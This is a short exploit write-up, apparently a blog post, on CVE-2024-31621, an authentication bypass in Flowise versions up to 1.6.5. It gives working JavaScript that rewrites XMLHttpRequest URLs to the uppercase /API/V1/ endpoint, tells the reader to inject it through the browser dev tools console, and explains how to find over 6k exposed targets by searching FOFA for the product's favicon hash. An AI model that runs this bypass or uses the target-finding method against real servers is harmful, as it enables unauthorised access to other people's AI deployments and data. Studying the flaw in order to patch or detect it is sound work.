CVE-2024-31621
Flowise <= 1.6.5 authentication bypass

Flowise is an open source low-code tool for developers to build customized LLM orchestration flow & AI agents.
Basically server doesn't checks requests to the uppercase endpoint /API/V1. 
We just have to replace all ajax requests endpoints to its uppercase version, and we'll do this client side.

here's the javascript code taken from my gist

var req = XMLHttpRequest.prototype.open;
XMLHttpRequest.prototype.open = function(method, url) {
    arguments[1] = url.replace('/api/v1/','/API/V1/');
    return req.apply(this, arguments);
};


To use this, navigate to a page that does not require authentication (ex: /tools),
then inject this code inside dev tools console.
Congratulations! This will last until you reload manually the page

[*] flowise_authbypass.png


Looking for vulnerable targets
Its favicon hash is -2051052918, knowing this we just have to search it on FOFA,
giving to us more than 6k results.

[*] fofa_results.png


By the way, most of these results are even without login bruh, this is because AI is a hot topic these last years,
so unexperienced people and companies will find a way to use an LLM for anything, inappropriate or not.